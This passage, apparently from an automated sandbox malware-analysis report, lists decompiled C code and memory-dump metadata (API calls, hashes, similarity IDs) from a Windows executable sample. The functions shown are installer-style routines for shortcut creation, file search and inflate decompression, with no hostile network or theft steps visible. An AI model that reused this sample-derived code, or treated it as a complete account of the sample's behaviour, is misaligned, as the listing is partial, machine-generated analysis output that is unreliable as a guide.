                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                                                                                                          • API String ID: 2624150263-350584602
                                                                                                                                                                                                          • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                                                                                                                                          • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                          			E0040216B(void* __eflags) {
                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                          				intOrPtr* _t63;
                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                          				intOrPtr* _t65;
                                                                                                                                                                                                          				intOrPtr* _t67;
                                                                                                                                                                                                          				intOrPtr* _t69;
                                                                                                                                                                                                          				intOrPtr* _t71;
                                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                                          				intOrPtr* _t75;
                                                                                                                                                                                                          				intOrPtr* _t78;
                                                                                                                                                                                                          				intOrPtr* _t80;
                                                                                                                                                                                                          				intOrPtr* _t82;
                                                                                                                                                                                                          				intOrPtr* _t84;
                                                                                                                                                                                                          				int _t87;
                                                                                                                                                                                                          				intOrPtr* _t95;
                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                          				void* _t111;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                                                                                                                                                                          				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                                                                                                                                                                          				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                                                                                                                                                                          				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                                                                                                                                                                          				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                                                                                                                                                                          				_t55 =  *(_t111 - 0x18);
                                                                                                                                                                                                          				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                                                                                                                                                                          				_t105 = _t55 & 0x00008000;
                                                                                                                                                                                                          				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                                                                                                                                          				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                          				if(E00405C52( *(_t111 - 0xc)) == 0) {
                                                                                                                                                                                                          					E00402BCE(0x21);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t59 = _t111 + 8;
                                                                                                                                                                                                          				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                                                                                                                                                                          				if(_t59 < _t87) {
                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                          					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                                                                                                                                          					_push(0xfffffff0);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                                                                                                                                                                          					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                                                                                                                                          					if(_t64 >= _t87) {
                                                                                                                                                                                                          						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                                                                                                                                          						if(_t105 == _t87) {
                                                                                                                                                                                                          							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp");
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t109 != _t87) {
                                                                                                                                                                                                          							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                                                                                                                                                                          						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                                                                                                                                                                          						if( *_t95 != _t87) {
                                                                                                                                                                                                          							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                                                                                                                                                                          						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                                                                                                                                                                          						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                                                                                          							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                                                                                                                                          							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                                                                                                                                          								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                                                                                                          								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                                                                                                                                          						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                                                                                                                                          					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                                                                                                                                          						_push(0xfffffff4);
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E00401423();
                                                                                                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?), ref: 004021F0
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                          • API String ID: 123533781-2935972921
                                                                                                                                                                                                          • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                                                                                                                                          • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                                                                                                                                                                          					E004061AB(__edi, _t6);
                                                                                                                                                                                                          					_push(_t19 - 0x1a4);
                                                                                                                                                                                                          					_push(__esi);
                                                                                                                                                                                                          					E0040624D();
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					 *__edi = __ebx;
                                                                                                                                                                                                          					 *__esi = __ebx;
                                                                                                                                                                                                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                          • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                                                                                                                                          • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                          			E00406A9B(signed int __ebx, signed int* __esi) {
                                                                                                                                                                                                          				signed int _t396;
                                                                                                                                                                                                          				signed int _t425;
                                                                                                                                                                                                          				signed int _t442;
                                                                                                                                                                                                          				signed int _t443;
                                                                                                                                                                                                          				signed int* _t446;
                                                                                                                                                                                                          				void* _t448;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				L0:
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					L0:
                                                                                                                                                                                                          					_t446 = __esi;
                                                                                                                                                                                                          					_t425 = __ebx;
                                                                                                                                                                                                          					if( *(_t448 - 0x34) == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L55:
                                                                                                                                                                                                          					__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                          					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                                                          					__ecx = __ebx;
                                                                                                                                                                                                          					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                                                          					__ebx = __ebx + 8;
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						L56:
                                                                                                                                                                                                          						if(__ebx < 0xe) {
                                                                                                                                                                                                          							goto L0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L57:
                                                                                                                                                                                                          						__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                          						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                                                                                                                                          						__ecx = __eax;
                                                                                                                                                                                                          						__esi[1] = __eax;
                                                                                                                                                                                                          						__ecx = __eax & 0x0000001f;
                                                                                                                                                                                                          						if(__cl > 0x1d) {
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							_t443 = _t442 | 0xffffffff;
                                                                                                                                                                                                          							 *_t446 = 0x11;
                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                          							_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                                                                                                          							_t446[0x146] = _t425;
                                                                                                                                                                                                          							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                          							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                                                                                                                                          							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                                                                                                                                          							E0040720A( *(_t448 + 8));
                                                                                                                                                                                                          							return _t443;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L58:
                                                                                                                                                                                                          						__eax = __eax & 0x000003e0;
                                                                                                                                                                                                          						if(__eax > 0x3a0) {
                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L59:
                                                                                                                                                                                                          						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                                                                                                                                          						__ebx = __ebx - 0xe;
                                                                                                                                                                                                          						_t94 =  &(__esi[2]);
                                                                                                                                                                                                          						 *_t94 = __esi[2] & 0x00000000;
                                                                                                                                                                                                          						 *__esi = 0xc;
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							L60:
                                                                                                                                                                                                          							__esi[1] = __esi[1] >> 0xa;
                                                                                                                                                                                                          							__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                                                                                                          							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                                                                                                          								goto L68;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L61:
                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                          								L64:
                                                                                                                                                                                                          								if(__ebx >= 3) {
                                                                                                                                                                                                          									break;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L62:
                                                                                                                                                                                                          								if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                                                          									goto L182;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L63:
                                                                                                                                                                                                          								__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                          								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                                                          								__ecx = __ebx;
                                                                                                                                                                                                          								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                                                          								__ebx = __ebx + 8;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L65:
                                                                                                                                                                                                          							__ecx = __esi[2];
                                                                                                                                                                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                                                                                                          							__ebx = __ebx - 3;
                                                                                                                                                                                                          							_t108 = __ecx + 0x408408; // 0x121110
                                                                                                                                                                                                          							__ecx =  *_t108;
                                                                                                                                                                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                                                                                                                                          							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                                                                                                          							__ecx = __esi[1];
                                                                                                                                                                                                          							__esi[2] = __esi[2] + 1;
                                                                                                                                                                                                          							__eax = __esi[2];
                                                                                                                                                                                                          							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                                                                                                                                          							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                                                                                                                                          								goto L64;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L66:
                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                          								L68:
                                                                                                                                                                                                          								if(__esi[2] >= 0x13) {
                                                                                                                                                                                                          									break;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L67:
                                                                                                                                                                                                          								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                                                                                                                                                                          								__eax =  *_t119;
                                                                                                                                                                                                          								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                                                                                                                                          								_t126 =  &(__esi[2]);
                                                                                                                                                                                                          								 *_t126 = __esi[2] + 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L69:
                                                                                                                                                                                                          							__ecx = __ebp - 8;
                                                                                                                                                                                                          							__edi =  &(__esi[0x143]);
                                                                                                                                                                                                          							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                                                                                                                                          							__eax = 0;
                                                                                                                                                                                                          							 *(__ebp - 8) = 0;
                                                                                                                                                                                                          							__eax =  &(__esi[3]);
                                                                                                                                                                                                          							 *__edi = 7;
                                                                                                                                                                                                          							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                                                                                                                                          							if(__eax != 0) {
                                                                                                                                                                                                          								L72:
                                                                                                                                                                                                          								 *__esi = 0x11;
                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                          									L180:
                                                                                                                                                                                                          									_t396 =  *_t446;
                                                                                                                                                                                                          									if(_t396 > 0xf) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									L1:
                                                                                                                                                                                                          									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
                                                                                                                                                                                                          										case 0:
                                                                                                                                                                                                          											L101:
                                                                                                                                                                                                          											__eax = __esi[4] & 0x000000ff;
                                                                                                                                                                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                                                                                                          											__eax = __esi[5];
                                                                                                                                                                                                          											__esi[2] = __esi[5];
                                                                                                                                                                                                          											 *__esi = 1;
                                                                                                                                                                                                          											goto L102;
                                                                                                                                                                                                          										case 1:
                                                                                                                                                                                                          											L102:
                                                                                                                                                                                                          											__eax = __esi[3];
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												L105:
                                                                                                                                                                                                          												__eflags = __ebx - __eax;
                                                                                                                                                                                                          												if(__ebx >= __eax) {
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L103:
                                                                                                                                                                                                          												__eflags =  *(__ebp - 0x34);
                                                                                                                                                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                                                          													goto L182;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L104:
                                                                                                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                                                          												__ecx = __ebx;
                                                                                                                                                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                                                          												__ebx = __ebx + 8;
                                                                                                                                                                                                          												__eflags = __ebx;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L106:
                                                                                                                                                                                                          											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                                                                                                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                                                                                                          											__ecx = __esi[2];
                                                                                                                                                                                                          											__eax = __esi[2] + __eax * 4;
                                                                                                                                                                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                                                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                                                                                                          											__ecx =  *__eax & 0x000000ff;
                                                                                                                                                                                                          											__eflags = __ecx;
                                                                                                                                                                                                          											if(__ecx != 0) {
                                                                                                                                                                                                          												L108:
                                                                                                                                                                                                          												__eflags = __cl & 0x00000010;
                                                                                                                                                                                                          												if((__cl & 0x00000010) == 0) {
                                                                                                                                                                                                          													L110:
                                                                                                                                                                                                          													__eflags = __cl & 0x00000040;
                                                                                                                                                                                                          													if((__cl & 0x00000040) == 0) {
                                                                                                                                                                                                          														goto L125;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L111:
                                                                                                                                                                                                          													__eflags = __cl & 0x00000020;
                                                                                                                                                                                                          													if((__cl & 0x00000020) == 0) {
                                                                                                                                                                                                          														goto L9;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L112:
                                                                                                                                                                                                          													 *__esi = 7;
                                                                                                                                                                                                          													goto L180;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L109:
                                                                                                                                                                                                          												__esi[2] = __ecx;
                                                                                                                                                                                                          												__esi[1] = __eax;
                                                                                                                                                                                                          												 *__esi = 2;
                                                                                                                                                                                                          												goto L180;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L107:
                                                                                                                                                                                                          											__esi[2] = __eax;
                                                                                                                                                                                                          											 *__esi = 6;
                                                                                                                                                                                                          											goto L180;
                                                                                                                                                                                                          										case 2:
                                                                                                                                                                                                          											L113:
                                                                                                                                                                                                          											__eax = __esi[2];
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												L116:
                                                                                                                                                                                                          												__eflags = __ebx - __eax;
                                                                                                                                                                                                          												if(__ebx >= __eax) {
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L114:
		__eflags =  *(__ebp - 0x34);
		if( *(__ebp - 0x34) == 0) {
			goto L182;
		}
		L115:
		__ecx =  *(__ebp - 0x38);
		 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
		__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
		__ecx = __ebx;
		__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
		 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
		 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
		__ebx = __ebx + 8;
		__eflags = __ebx;
	}
	L117:
	 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
	__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
	__ecx = __eax;
	 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
	__ebx = __ebx - __eax;
	__eflags = __ebx;
	__eax = __esi[4] & 0x000000ff;
	__esi[3] = __esi[4] & 0x000000ff;
	__eax = __esi[6];
	__esi[2] = __esi[6];
	 *__esi = 3;
	goto L118;
case 3:
	L118:
	__eax = __esi[3];
	while(1) {
		L121:
		__eflags = __ebx - __eax;
		if(__ebx >= __eax) {
			break;
		}
		L119:
		__eflags =  *(__ebp - 0x34);
		if( *(__ebp - 0x34) == 0) {
			goto L182;
		}
		L120:
		__ecx =  *(__ebp - 0x38);
		 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
		__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
		__ecx = __ebx;
		__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
		 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
		 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
		__ebx = __ebx + 8;
		__eflags = __ebx;
	}
	L122:
	__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
	__eax = __eax &  *(__ebp - 0x40);
	__ecx = __esi[2];
	__eax = __esi[2] + __eax * 4;
	__ecx =  *(__eax + 1) & 0x000000ff;
	 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
	__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
	__ecx =  *__eax & 0x000000ff;
	__eflags = __cl & 0x00000010;
	if((__cl & 0x00000010) == 0) {
		L124:
		__eflags = __cl & 0x00000040;
		if((__cl & 0x00000040) != 0) {
			goto L9;
		}
		L125:
		__esi[3] = __ecx;
		__ecx =  *(__eax + 2) & 0x0000ffff;
		__esi[2] = __eax;
		goto L180;
	}
	L123:
	__esi[2] = __ecx;
	__esi[3] = __eax;
	 *__esi = 4;
	goto L180;
case 4:
	L126:
	__eax = __esi[2];
	while(1) {
		L129:
		__eflags = __ebx - __eax;
		if(__ebx >= __eax) {
			break;
		}
		L127:
		__eflags =  *(__ebp - 0x34);
		if( *(__ebp - 0x34) == 0) {
			goto L182;
		}
		L128:
		__ecx =  *(__ebp - 0x38);
		 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
		__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
		__ecx = __ebx;
		__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
		 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
		 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
		__ebx = __ebx + 8;
		__eflags = __ebx;
	}
	L130:
	 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
	__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
	__ecx = __eax;
	 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
	__ebx = __ebx - __eax;
	__eflags = __ebx;
	 *__esi = 5;
	goto L131;
case 5:
	L131:
	__eax =  *(__ebp - 0x30);
	__edx = __esi[3];
	__eax = __eax - __esi;
	__ecx = __eax - __esi - 0x1ba0;
	__eflags = __eax - __esi - 0x1ba0 - __edx;
	if(__eax - __esi - 0x1ba0 >= __edx) {
		__ecx = __eax;
		__ecx = __eax - __edx;
		__eflags = __ecx;
	} else {
		__esi[0x26e8] = __esi[0x26e8] - __edx;
		__ecx = __esi[0x26e8] - __edx - __esi;
		__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
	}
	__eflags = __esi[1];
	 *(__ebp - 0x20) = __ecx;
	if(__esi[1] != 0) {
		L135:
		__edi =  *(__ebp - 0x2c);
		do {
			L136:
			__eflags = __edi;
			if(__edi != 0) {
				goto L152;
			}
			L137:
			__edi = __esi[0x26e8];
			__eflags = __eax - __edi;
			if(__eax != __edi) {
				L143:
				__esi[0x26ea] = __eax;
				__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
				__eax = __esi[0x26ea];
				__ecx = __esi[0x26e9];
